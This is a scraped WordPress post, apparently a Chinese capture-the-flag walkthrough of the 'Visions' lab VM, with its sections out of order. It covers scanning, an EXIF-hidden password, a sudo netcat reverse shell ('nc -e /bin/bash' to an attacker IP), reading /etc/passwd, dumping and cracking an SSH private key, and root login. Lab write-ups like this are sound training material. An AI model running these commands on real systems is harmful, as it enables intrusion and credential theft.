7Itf3P39SxqlP2pQwAAAAxyb290QHZpc2lvbnMBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
sophia@visions:\/home\/isabella$ exit\nexit\nisabella@visions:~$ exit\nlogout\nConnection to 192.168.0.168 closed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ vim root \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ chmod 600 root \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ ssh root@192.168.0.168 -i root \nLinux visions 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 19 05:24:08 2021\nroot@visions:~# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Apr 19 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\n-rwx--x--x 1 root root 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 root root 4096 Apr 19 2021 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 15 Apr 19 2021 root.txt\ndrwx------ 2 root root 4096 Apr 19 2021 .ssh\nroot@visions:~# cat root.txt \nhmvitspossible\nroot@visions:~# cat flag.sh \n#!\/bin\/bash\necho '\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m' \n\necho "-------------------------"\necho "\\nPWNED HOST: $(hostname)"\necho "\\nPWNED DATE: $(date)"\necho "\\nWHOAMI: $(id)"\necho "\\nFLAG: $(cat root.txt 2>\/dev\/null || cat user.txt 2>\/dev\/null || echo "Keep trying.")"\necho "\\n------------------------"<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\n
\u53e6\u4e00\u4e2a\u5de5\u5177\u53ef\u4ee5\u7834\u89e3id_rsa<\/code>\u7684\u5bc6\u7801<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ rsacrack -w \/usr\/share\/wordlists\/rockyou.txt -k id_rsa\n\n\u256d\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u256e \u256d\u256e \n\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503 \u2503\u2503 \n\u2503\u2570\u2501\u256f\u2503\u2570\u2501\u2501\u252b\u2503 \u2503\u2523\u2501\u2501\u2533\u2501\u2533\u2501\u2501\u2533\u2501\u2501\u252b\u2503\u256d\u256e\n\u2503\u256d\u256e\u256d\u253b\u2501\u2501\u256e\u2503\u2570\u2501\u256f\u2503\u256d\u2501\u252b\u256d\u252b\u256d\u256e\u2503\u256d\u2501\u252b\u2570\u256f\u256f\n\u2503\u2503\u2503\u2570\u252b\u2570\u2501\u256f\u2503\u256d\u2501\u256e\u2503\u2570\u2501\u252b\u2503\u2503\u256d\u256e\u2503\u2570\u2501\u252b\u256d\u256e\u256e\n\u2570\u256f\u2570\u2501\u253b\u2501\u2501\u2501\u253b\u256f \u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\n-=========================-\n[*] Cracking: id_rsa\n[*] Wordlist: \/usr\/share\/wordlists\/rockyou.txt\n[i] Status:\n 11274\/14344392\/0%\/invisible\n[+] Password: invisible Line: 11274<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Visions \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions] \u2514\u2500$ r […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-625","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=625"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions"}],"predecessor-version":[{"id":626,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions\/626"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=625"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ rustscan -a 192.168.0.168 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.168:22\nOpen 192.168.0.168:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 03:02 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nInitiating Ping Scan at 03:02\nScanning 192.168.0.168 [2 ports]\nCompleted Ping Scan at 03:02, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 03:02\nCompleted Parallel DNS resolution of 1 host. at 03:02, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 03:02\nScanning visions (192.168.0.168) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.168\nDiscovered open port 22\/tcp on 192.168.0.168\nCompleted Connect Scan at 03:02, 0.00s elapsed (2 total ports)\nInitiating Service scan at 03:02\nScanning 2 services on visions (192.168.0.168)\nCompleted Service scan at 03:02, 6.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.168.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.21s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNmap scan report for visions (192.168.0.168)\nHost is up, received syn-ack (0.00046s latency).\nScanned at 2024-04-24 03:02:34 EDT for 6s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 85:d0:93:ff:b6:be:e8:48:a9:2c:86:4c:b6:84:1f:85 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyo46pXRt0tw2ynd0rsEvgyTECanjcW6Vp0gdxgMID8h9aWVoqB9fQ8YZ+IVXMlIPvuu1xXPaQm1dR9K9BRkFKrtZPn7P1X1D7wlI1NYj+zHKDC8tTLEUiSdsvFms4709PPQCU36+fvcr+Y3MceyF\/Ubmo7+XEptQyvdapbVFhmM68BTP3K5F5eLaW82\/lM7sXSjP4F6skZ5YJgHv4U0RUET13XikQvg\/KidPiaBtu\/lPjUgY9T1Hc2MHmtsjSC3qvglCIoSHD8SO1cuSv7FdFUMW+N7ouKPtyYaE6KclJs3GGWv5F7R4i7N0jewqQlN7PXQ5LzObmis\/o27m66PSd\n| 256 5d:fb:77:a5:d3:34:4c:46:96:b6:28:a2:6b:9f:74:de (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNcgLO3Sm65LdnZyrcyCdt+O4vIVjOwXFft0MKc7PHhUQjqFabj2OOO0O1a+xFaxVoaciPyeu0e9d9bQu+35l5o=\n| 256 76:3a:c5:88:89:f2:ab:82:05:80:80:f9:6c:3b:20:9d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAJcRrAeaLaJkDa1ardJpErIeSQrQEG9S41nyrKmBXmw\n80\/tcp open http syn-ack nginx 1.14.2\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.14.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 03:02\nCompleted NSE at 03:02, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.99 seconds<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ curl http:\/\/192.168.0.168 \n<!-- \nOnly those that can see the invisible can do the imposible.\nYou have to be able to see what doesnt exist.\nOnly those that can see the invisible being able to see whats not there.\n-alicia -->\n..........\n <img src="white.png"><\/code><\/pre>\n\u63d0\u53d6\u6587\u4ef6\u4fe1\u606f<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ wget http:\/\/192.168.0.168\/white.png\n--2024-04-24 03:05:58-- http:\/\/192.168.0.168\/white.png\nConnecting to 192.168.0.168:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 12655 (12K) [image\/png]\nSaving to: \u2018white.png\u2019\n\nwhite.png 100%[=========================================================================>] 12.36K --.-KB\/s in 0s \n\n2024-04-24 03:05:58 (1.07 GB\/s) - \u2018white.png\u2019 saved [12655\/12655]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt white.png StegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[!] error: the file format of the file "white.png" is not supported.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ exiftool white.png \nExifTool Version Number : 12.76\nFile Name : white.png\nDirectory : .\nFile Size : 13 kB\nFile Modification Date\/Time : 2021:04:19 05:05:04-04:00\nFile Access Date\/Time : 2024:04:24 03:06:22-04:00\nFile Inode Change Date\/Time : 2024:04:24 03:05:58-04:00\nFile Permissions : -rw-r--r--\nFile Type : PNG\nFile Type Extension : png\nMIME Type : image\/png\nImage Width : 1920\nImage Height : 1080\nBit Depth : 8\nColor Type : RGB with Alpha\nCompression : Deflate\/Inflate\nFilter : Adaptive\nInterlace : Noninterlaced\nBackground Color : 255 255 255\nPixels Per Unit X : 11811\nPixels Per Unit Y : 11811\nPixel Units : meters\nModify Date : 2021:04:19 08:26:43\nComment : pw:ihaveadream\nImage Size : 1920x1080\nMegapixels : 2.1<\/code><\/pre>\n\u5f97\u5230\u5bc6\u7801\uff1aihaveadream<\/code><\/p>\n\u5c1d\u8bd5ssh\u8fde\u63a5\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\nNC\u8f6c\u53d1shell<\/h3>\n
\u53d1\u73b0\u7528\u6237emma<\/code>\u53ef\u4ee5\u4f7f\u7528NC\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8f6c\u53d1shell\uff01<\/p>\nalicia@visions:~$ ls -la\ntotal 20\ndrwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 alicia alicia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 alicia alicia 3526 Apr 19 2021 .bashrc\n-rw-r--r-- 1 alicia alicia 807 Apr 19 2021 .profile\nalicia@visions:~$ sudo -l\nMatching Defaults entries for alicia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser alicia may run the following commands on visions:\n (emma) NOPASSWD: \/usr\/bin\/nc\nalicia@visions:~$ sudo -u emma \/usr\/bin\/nc -e \/bin\/bash 192.168.143 1234\nstty: 'standard input': Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found<\/code><\/pre>\n<\/div><\/p>\n\u7ee7\u7eed\u8fdb\u4e00\u6b65\u63d0\u6743\uff1a<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) emma@visions:\/home\/alicia$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for emma: \n(remote) emma@visions:\/home\/alicia$ cd ..\/emma\/\n(remote) emma@visions:\/home\/emma$ ls -la\ntotal 32\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 emma emma 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 emma emma 3526 Apr 19 2021 .bashrc\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 .local\n-rw------- 1 emma emma 20 Apr 19 2021 note.txt\n-rw-r--r-- 1 emma emma 807 Apr 19 2021 .profile\n-rw------- 1 emma emma 53 Apr 19 2021 .Xauthority\n(remote) emma@visions:\/home\/emma$ cat note.txt \nI cant help myself.\n(remote) emma@visions:\/home\/emma$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nemma:x:1000:1000:emma,,,:\/home\/emma:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nalicia:x:1001:1001:,,,:\/home\/alicia:\/bin\/bash\nsophia:x:1002:1002:,,,:\/home\/sophia:\/bin\/bash\nisabella:x:1003:1003:,,,:\/home\/isabella:\/bin\/bash\n(remote) emma@visions:\/home\/emma$ cd ..\n(remote) emma@visions:\/home$ ls -la\ntotal 24\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 19 2021 ..\ndrwxr-xr-x 2 alicia alicia 4096 Apr 19 2021 alicia\ndrwxr-xr-x 3 emma emma 4096 Apr 19 2021 emma\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 isabella\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 sophia\n(remote) emma@visions:\/home$ cd isabella\/\n(remote) emma@visions:\/home\/isabella$ ls -la\ntotal 28\ndrwxr-xr-x 3 isabella isabella 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 isabella isabella 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 isabella isabella 3526 Apr 19 2021 .bashrc\n-rw------- 1 isabella isabella 1876 Apr 19 2021 .invisible\n-rw-r--r-- 1 isabella isabella 807 Apr 19 2021 .profile\ndrwx------ 2 isabella isabella 4096 Apr 19 2021 .ssh\n(remote) emma@visions:\/home\/isabella$ cd ..\/sophia\/\n(remote) emma@visions:\/home\/sophia$ ls -la\ntotal 32\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc\n-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local\n-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile\n-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt\n(remote) emma@visions:\/home\/sophia$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n(remote) emma@visions:\/home\/sophia$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper<\/code><\/pre>\nPS\u8c03\u6574\u989c\u8272\u66f2\u7ebf\u83b7\u5f97\u7528\u6237<\/h3>\n
\u7136\u540e\u770b\u4e86\u4e00\u4e0b\u5e08\u5085\u4eec\u7684wp\uff0c\u53d1\u73b0\u662f\u8981\u5bf9\u4e4b\u524d\u90a3\u4e2a\u56fe\u7247\u8fdb\u884c\u4e8c\u6b21\u5904\u7406\u3002\u3002\u3002\u3002<\/p>\n
PS<\/code>-\u56fe\u50cf<\/code>-\u8c03\u6574<\/code>-\u66f2\u7ebf<\/code>\u6216\u8005ctrl+M<\/code><\/p>\n<\/div><\/p>\nocr\u4e00\u4e0b\uff1a<\/p>\n
sophia\/seemstobeimpossible<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
<\/div><\/p>\ncat\u63d0\u6743isabella<\/h3>\nsophia@visions:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .\ndrwxr-xr-x 6 root root 4096 Apr 19 2021 ..\n-rw-r--r-- 1 sophia sophia 220 Apr 19 2021 .bash_logout\n-rw-r--r-- 1 sophia sophia 3526 Apr 19 2021 .bashrc\n-rwx--x--x 1 sophia sophia 1920 Apr 19 2021 flag.sh\ndrwxr-xr-x 3 sophia sophia 4096 Apr 19 2021 .local\n-rw-r--r-- 1 sophia sophia 807 Apr 19 2021 .profile\n-rw------- 1 sophia sophia 18 Apr 19 2021 user.txt\nsophia@visions:~$ cat flag.sh \n#!\/bin\/bash\necho '\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m' \n\necho "-------------------------"\necho "\\nPWNED HOST: $(hostname)"\necho "\\nPWNED DATE: $(date)"\necho "\\nWHOAMI: $(id)"\necho "\\nFLAG: $(cat root.txt 2>\/dev\/null || cat user.txt 2>\/dev\/null || echo "Keep trying.")"\necho "\\n------------------------"\nsophia@visions:~$ .\/flag.sh \n\\033[0;35m\n . ** \n * *. \n ,* \n *, \n , ,* \n ., *, \n \/ * \n ,* *, \n \/. .*. \n * ** \n ,* ,* \n ** *. \n ** **. \n ,* ** \n *, ,* \n * ** \n *, .* \n *. ** \n ** ,*, \n ** *, \\033[0m\n-------------------------\n\\nPWNED HOST: visions\n\\nPWNED DATE: Wed 24 Apr 2024 03:28:06 AM EDT\n\\nWHOAMI: uid=1002(sophia) gid=1002(sophia) groups=1002(sophia)\n\\nFLAG: hmvicanseeforever\n\\n------------------------\nsophia@visions:~$ cat user.txt\nhmvicanseeforever\nsophia@visions:~$ sudo -l\nMatching Defaults entries for sophia on visions:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sophia may run the following commands on visions:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/cat \/home\/isabella\/.invisible\nsophia@visions:~$ ls -l \/home\/isabella\/.invisible\n-rw------- 1 isabella isabella 1876 Apr 19 2021 \/home\/isabella\/.invisible\nsophia@visions:~$ sudo -u isabella \/usr\/bin\/cat \/home\/isabella\/.invisible\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBMekPa3i\n1sMQAToGnurcIWAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDNAxlJldzm\nIgVNFXbjg51CS4YEuIxM5gQxjafNJ\/rzYw0sOPkT9sL6dYasQcOHX1SYxk5E+qD8QNZQPZ\nGfACdWDLwOcI4LLME0BOjARwmrpU4mJXwugX4+RbGICFMgY8ZYtKXEIoF8dwKPVsBdoIwi\nlgHyfJD4LwkqfV6mvlau+XRZZBhvlNP10F0SAAZqBaA9y7hRWJO\/XcCZC6HzJKzloAL2Xw\nGvAMzgtPH\/wj06NoOFjmVGMfmmHzCwgc+fLOeXXYzFeRNPH3cVExc+BnB8Ju6CFa6n7VBV\nHLCYJ3CcgKnxv6OwVtkoDi0UEFUOefELQV7fZ+g1sZt\/+2XPsmcZAAAD0E8RIvVF4XlKJq\nINtHdJ5QJZCuq2ufynbPNiHF53PqSlmC\/\/OkQZMWgJ5DcbzMJ92IqxRgjilZZUOUbE\/SFI\nPViwmpRWIGAhlyoPXyV513ukhb4UngYlgCP9qC4Rbn+Tp9Fv7lnAoD0DsmwITM2e\/Z65AD\n\/i\/BqrJ6scNEN0q+qNr3zOVljMZx+qy8cbuDn9Tbq2\/N+mcoEysfjfOaoJIgVJnLx1XE6r\n+Y9UcRyPAYs+5TB1Nz\/fpnBo7vesOu5XLUqCBCphFGmdMCdSGYZAweitjQ+Mq36hQmCtSs\nDwcbjg8vy5LJ+mtJXA7QhqgAfXWnLLny4NeCztUnTG0NLjbLR6M5e+HSsi2EqDYoGNpWld\nl4YzVPQoFMIaUJOGTc+VfkMWbQhzpiu66\/Du8dwhC+p6QSmwhV\/M70eWaH2ZVjK3MThg9K\nCVugFsLxioqlp\/rnE1oq7apTBX6FOjwz0ne+ytTVOQrHuPTs2QL4PlCvhPRoIuqydleFs4\nrdtzE6b46PexXlupewywiO5AVzbfSRAlCYwiwV42xGpYsNcKhdUY+Q9d9i9yudjIFoicrA\nMG9hxr7\/DJqEY311kTglDEHqQB3faErYsYPiOL9TTZWnPLZhClrPbiWST5tmMWxgNE\/AKY\nR7mKGDBOMFPlBAjGuKqR6zk5DEc3RzJnvGjUlaT3zzdVmxD8SpWtjzS6xHaSw\/WOvB0lsg\nDhf+Gc7OWyHm2qk+OMK9t0\/lbIDfn3su0EHwbPjYTT3xk7CtG4AwiSqPve1t9bOdzD9w9r\nTM7am\/2i\/BV1uv28823pCuYZmNG7hu5InzNC\/3iTROraE31Qqe3JCNwxVDcHqb8s6gTN+J\nq6OyZdvNNiVQUo1l7hNUlg4he4q1kTwoyAATa0hPKVxEFEISRtaQln5Ni8V+fos8GTqgAr\nHH2LpFa4qZKTtUEU0f54ixjFL7Lkz6owbUG7Cy+LuGDI1aKJRGCZwd5LkStcF\/MAO3pulc\nMsHiYwmXT3lNHhkAd1h05N2yBzXaH+M3sX6IpNtq+gi+9F443Enk7FBRFLzxdJ+UT40f6E\n+gyA2nBGygNhvQHXcu36A8BoE+IF7YVpdfDmYJffbTujtBUj2vrdsqVvtGUxf0vj9\/Sv+J\nHN9Yk2giXN8VX7qhcyLzUktmdfgd6JNAx+\/P7Kh3HV5oWk1Da+VJS+wtCg\/oEVSVyrEOpe\nskV8zcwd+ErNODEHTUbD\/nDARX8GeV158RMtRdZ5CJZSFjBz2oPDPDVpZMFNhENAAwPnrJ\nKD\/C2J6CKylbopifizfpEkmVqJRms=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8be5\u5bc6\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ vim id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ ssh isabella@192.168.0.168 -i id_rsa\nEnter passphrase for key 'id_rsa': <\/code><\/pre>\n\u53d1\u73b0\u9700\u8981\u5bc6\u7801\uff0c\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/visions]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashes\nCost 2 (iteration count) is 16 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\ninvisible (id_rsa) \n1g 0:00:15:28 DONE (2024-04-24 04:09) 0.001077g\/s 12.15p\/s 12.15c\/s 12.15C\/s merda..gunner1\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\u5f97\u5230\u5bc6\u7801\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\ncat+\u52a8\u6001\u94fe\u63a5\u63d0\u6743<\/h3>\n
